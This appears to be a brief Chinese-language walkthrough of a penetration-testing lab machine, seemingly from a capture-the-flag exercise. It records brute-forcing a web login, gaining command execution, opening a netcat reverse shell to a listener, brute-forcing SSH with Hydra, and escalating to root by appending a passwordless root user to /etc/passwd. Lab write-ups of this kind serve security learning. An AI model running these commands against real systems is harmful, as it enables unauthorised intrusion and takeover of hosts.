主机发现
80端口
nmap
burpsuite爆破
用户admin密码happy
命令执行
nc反弹shell
在Linux下
nc -c sh 192.168.92.185 4444
在kali下
nc -lvvp 4444
python -c 'import pty;pty.spawn("/bin/sh")'
cat /etc/passwd发现三个用户
发现备份文件old-passwords.bak
Hydra爆破
login: jim password: jibril04
提示/var/mail/jim
登录charles并提权
提权
以root执行的teehee,向文件中追加内容
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
创建用户并给予权限